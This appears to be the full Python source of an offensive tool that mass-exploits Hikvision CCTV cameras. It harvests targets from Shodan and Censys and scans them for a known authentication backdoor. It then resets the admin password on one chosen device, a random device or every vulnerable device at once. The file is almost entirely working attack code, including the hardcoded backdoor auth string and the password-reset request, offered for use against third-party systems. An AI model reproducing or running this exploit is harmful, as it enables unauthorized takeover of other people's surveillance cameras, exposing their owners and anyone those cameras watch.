# -*- coding: utf-8 -*-
import sys
import socket
from socket import error as socket_error
import os
import time
import shodan
import requests
import re
import subprocess
import random
import json
import censys
import censys.ipv4
from censys.base import CensysException
import webbrowser
global path
global host
path = os.path.abspath(os.path.dirname(sys.argv[0]))
userID = ""
userName = ""
newPass = ""
host = open(path + '/host.txt' , 'r').read().splitlines()
up_host = open(path + '/up_host.txt', 'r').read().splitlines()
vulnerable_host = open(path + '/vuln_host.txt', 'r').read().splitlines()
BackdoorAuthArg = "auth=YWRtaW46MTEK"
def usage():
print (""" ____ ____ _ __ __ _ _
|_ || _| (_) [ | _ [ | (_) / |_
| |__| | __ | | / ] _ __ _ .--. | | .--. __ `| |-'
| __ | [ | | '' < [ \ [ ][ '/'`\ \| |/ .'`\ \[ | | |
_| | | |_ | | | |`\ \ > ' < | \__/ || || \__. | | | | |,
|____||____|[___][__| \_][__]`\_] | ;.__/[___]'.__.' [___]\__/
[__| """)
print (""" +------------------------------------------------------------+
| exploit all the vulnerable cctv from hikvision |
|------------------------------------------------------------|
| Usage: |
| 1. Gather host with shodan (api needed) |
| 2. Gather host with censys.io (api needed) |
| 3. scan for up host |
| 4. scan for vuln host |
| 5. mass exploit all vuln CCTV |
| 6. select a CCTV'S ip to exploit |
| 7. random exploit CCTV from the vuln list |
| 8. install dependency |
+------------------------------------------------------------+""")
def gather_host_shodan():
api_shodan_key = open(path + "/api.txt","r").read()
if api_shodan_key == "":
print('no shodan api found, please insert a valid one')
api_shodan_key_to_file = raw_input('\ntype here:')
with open(path + "/api.txt", "wb") as api:
api.write(api_shodan_key_to_file)
api = shodan.Shodan(api_shodan_key)
else:
api = shodan.Shodan(api_shodan_key)
try:
query = raw_input("["+"*"+"]"+ " enter a valid shodan query:")
response = api.search(query)
with open(path +'/host.txt',"wb") as host:
for service in response['matches']:
host.write(service['ip_str']+ ":" + str(service['port']))#host.write(service['port']
host.write("\n")
except KeyboardInterrupt:
print ("\n[---]exiting now[---]")
def gather_host_censys():
censys_list = open(path+"/censys_api.txt","r").read().splitlines()
if censys_list == []:
print('no censys api found, please insert a valid one')
api_censys_uid = raw_input('[****]'+'type here uid:')
api_censys_scrt = raw_input('[****]'+'type here secret:')
with open(path+ "/censys_api.txt","wb") as api:
api.write(api_censys_uid + "\n" + api_censys_scrt)
else:
uid = censys_list[0]
secret = censys_list[1]
query = raw_input('[+]'+'enter a valid query:')
try:
for record in censys.ipv4.CensysIPv4(api_id=uid, api_secret=secret).search(query):
ip = record['ip']
port = record['protocols']
port_raw = port[0]
port = re.findall(r'\d+', port_raw)
with open(path + '/host.txt',"a") as cen:
cen.write(ip +":" + str(port[0]))
cen.write("\n")
except KeyboardInterrupt:
pass
except CensysException:
pass
2
def mass_exploit():
# VERY DANGEROUS
global target_host
global port
pattern_1 = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
pattern_2 = r'(\:).*'
a = 0
while a < len(vulnerable_host):
try:
res = vulnerable_host[a]
print res
match1 = re.search(pattern_1, res)
match2 = re.search(pattern_2, res)
target_host = match1.group()
port_raw = match2.group()
port = port_raw[1:]
newPass = "12345porcodio"
userID = "1"
userName = "admin"
userXML = '<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">''.<id>'+ userID + '</id>.<userName>'+ userName + '</userName>.<password>'+ newPass + '</password>.</User>'
URLBase = "http://"+target_host+ ":" + str(port) + "/"
URLUpload = URLBase + "Security/users/1?" + BackdoorAuthArg
x = requests.put(URLUpload, data=userXML).text
except requests.exceptions.ConnectionError:
pass
a += 1
def select_host_exploit():
global target_host
global port
global userID
global userName
pattern_1 = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
pattern_2 = r'(\:).*'
b = 0
while b < len(vulnerable_host):
res = vulnerable_host[b]
print str(b) + ". " + vulnerable_host[b]
print "\n"
b += 1
sel = raw_input('[+]'+"please select a number for a specific host to hack:")
res = vulnerable_host[int(sel)]
match1 = re.search(pattern_1 , res)
match2 = re.search(pattern_2 , res)
target_host = match1.group()
port_raw = match2.group()
port = port_raw[1:]
URLBase = "http://"+target_host+ ":" +str(port) + "/"
print"[-]Password must start with 4 numbers, im setting it up for u."
rawPass = raw_input('[*]'+'please choose a new password:')
newPass = str(random.randint(1,9)) + str(random.randint(1,9)) + str(random.randint(1,9)) + str(random.randint(1,9)) + rawPass
ans_1 = raw_input("[*]Do you wanna scan for existing user and id? (y/n):")
if ans_1 == "y":
lista = requests.get(URLBase + "Security/users?1"+ BackdoorAuthArg).text
idf = "<id>"
pattern_id = r'(<id>).*'
find_id = re.findall('<id>(.*?)</id>', lista,re.DOTALL)
find_user = re.findall('<userName>(.+?)</userName>', lista, re.DOTALL)
counter = 0
while counter < len(find_id):
print('[*]'+"Found user "+ find_user[counter] + " with id:" + find_id[counter])
counter += 1
select_user = input("[--]Select one user to change the password:")
select_user = select_user - 1
userID = find_id[select_user]
userName = find_user[select_user]
elif ans_1 == "n":
userID = "1"
userName = "admin"
userXML = '<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">''.<id>'+ userID + '</id>.<userName>'+ userName + '</userName>.<password>'+ newPass + '</password>.</User>'
URLUpload = URLBase + "Security/users/1?" + BackdoorAuthArg
a = requests.put(URLUpload, data=userXML)
if a.status_code == 200:
print('\n[ok]Changed password of ' + userName + ' to ' + newPass + ' at ' +res+ "\n")
elif a.status_code != 200:
print('[*]'+"Something went wrong!")
def random_host_exploit():
global target_host
global port
global userID
global userName
pattern_1 = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
pattern_2 = r'(\:).*'
b = 0
while b < len(host):
res = host[b]
print str(b) + ". " + host[b]
print "\n"
b += 1
op = len(host) - 1
sel = random.randint(1,op)
print"[--]Selected No. " + str(sel)
res = host[int(sel)]
match1 = re.search(pattern_1 , res)
match2 = re.search(pattern_2 , res)
target_host = match1.group()
port_raw = match2.group()
port = port_raw[1:]
URLBase = "http://"+target_host+ ":" +str(port) + "/"
print"[-]Password must start with 4 numbers, im setting it up for u."
rawPass = raw_input('[*]'+'please choose a new password:')
newPass = str(random.randint(1,9)) + str(random.randint(1,9)) + str(random.randint(1,9)) + str(random.randint(1,9)) + rawPass
ans_1 = raw_input("[*]Do you wanna scan for existing user and id? (y/n):")
if ans_1 == "y":
lista = requests.get(URLBase + "Security/users?1"+ BackdoorAuthArg).text
idf = "<id>"
pattern_id = r'(<id>).*'
find_id = re.findall('<id>(.*?)</id>', lista,re.DOTALL)
find_user = re.findall('<userName>(.+?)</userName>', lista, re.DOTALL)
counter = 0
while counter < len(find_id):
print('[*]'+"Found user "+ find_user[counter] + " with id:" + find_id[counter])
counter += 1
select_user = input("[--]Select one user to change the password:")
select_user = select_user - 1
userID = find_id[select_user]
userName = find_user[select_user]
elif ans_1 == "n":
userID = "1"
userName = "admin"
userXML = '<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">''.<id>'+ userID + '</id>.<userName>'+ userName + '</userName>.<password>'+ newPass + '</password>.</User>'
URLUpload = URLBase + "Security/users/1?" + BackdoorAuthArg
a = requests.put(URLUpload, data=userXML)
if a.status_code == 200:
print('\n[ok]Changed password of ' +userName+ ' to ' + newPass + ' at ' +res+ "\n")
elif a.status_code != 200:
print('[*]'+"Something went wrong!")
print a
def up_scan():
print"[+]Loading all host..."
a = 0
try:
while a < len(host):
global target_host
global port
pattern_1 = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
pattern_2 = r'(\:).*'
res = host[a]
match1 = re.search(pattern_1 , res)
match2 = re.search(pattern_2 , res)
target_host = match1.group()
port_raw = match2.group()
port = port_raw[1:]
try:
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.settimeout(5)
client.connect((target_host,int(port)))
client.send("GET /HTTP/1.1\r\nHost: google.com\r\n\r\n")
response = client.recv(4096)
x = True
except socket_error:
x = False
except KeyboardInterrupt:
print ("\n[---]exiting now[---]")
if x == True:
with open(path + '/up_host.txt',"a") as host_up:
host_up.write(target_host + ":" + port + "\n")
elif x == False:
pass
a += 1
except KeyboardInterrupt:
print ("\n[---]exiting now[---]")
def vuln_scan_exp():
p = 0
while p < len(up_host):
ip_to_check = up_host[p]
try:
sys.stdout.write("\r"+ "[##]Checking "+ ip_to_check)
sys.stdout.flush()
response = requests.get('http://'+ip_to_check+'/security/users/1?'+ BackdoorAuthArg)
if response.status_code == 200:
with open(path + '/vuln_host.txt' , 'a') as host_vuln:
host_vuln.write(ip_to_check + "\n")
elif response.status_code ==401:
pass
elif response.status_code ==404:
pass
p += 1
except requests.exceptions.ConnectionError:
pass
p += 1
def scan():
up_scan()
#vuln_scan_exp()
def install_dependence():
install = raw_input('[*]Would you like to install the dependency? (y/n)')
if install == "y":
os.system('pip install shodan')
os.system('pip install censys')
usage()
response()
elif install == "n":
usage()
response()
def response():
global usage
usage_str = raw_input('\n[#]Select an option:')
if str(usage_str) == "1":
gather_host_shodan()
response()
elif str(usage_str) == "2":
gather_host_censys()
response()
elif str(usage_str) == "3":
scan()
response()
elif str(usage_str) =="4":
vuln_scan_exp()
response()
elif str(usage_str) == "5":
print('[!!!]Very dangerous option please be careful')
answer = raw_input('[???]do you wanna continue? [y/n]')
if str(answer) == "y":
mass_exploit()
response()
elif str(answer) == "n":
response()
elif str(usage_str) == "6":
select_host_exploit()
response()
elif str(usage_str) == "7":
random_host_exploit()
response()
elif str(usage_str) =="8":
install_dependence()
elif str(usage_str) == "help":
main()
def main():
try:
usage()
response()
except KeyboardInterrupt:
print ("\n[---]exiting now[---]")
main()
